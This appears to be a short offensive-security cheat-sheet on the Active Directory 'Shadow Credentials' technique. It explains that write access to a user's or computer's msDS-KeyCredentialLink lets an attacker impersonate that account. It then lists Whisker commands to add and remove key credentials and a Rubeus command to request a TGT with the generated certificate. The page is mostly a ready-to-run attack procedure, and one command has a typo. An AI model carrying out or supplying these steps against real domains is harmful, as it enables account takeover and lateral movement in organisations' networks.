Shadow Credentials

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit
  4. Useful links


If you have permissions to write on msDS-KeyCredentialLink of a domain user or computer, you can modify it to obtain a TGT for it and therefore, impersonate it.


  • Write permission on msDS-KeyCredentialLink attribute of a domain user or computer.


For the following exploit, in the case the target is a computer, don’t forget to add the $ at the end of the samAccountName.

# Get keys of the target.
.\Whisker.exe list /target$samAccountName

# Add a new pair of keys to the target.
.\Whisker.exe add /target:$samAccountName

# Request a TGT with the certificate and password generated with Whisker.
Rubeus.exe asktgt /user:$samAccountName /certificate:$certificate /password:$password /nowrap

# Remove the key you added.
.\Whisker.exe remove /target:$samAccountName /deviceid:$deviceId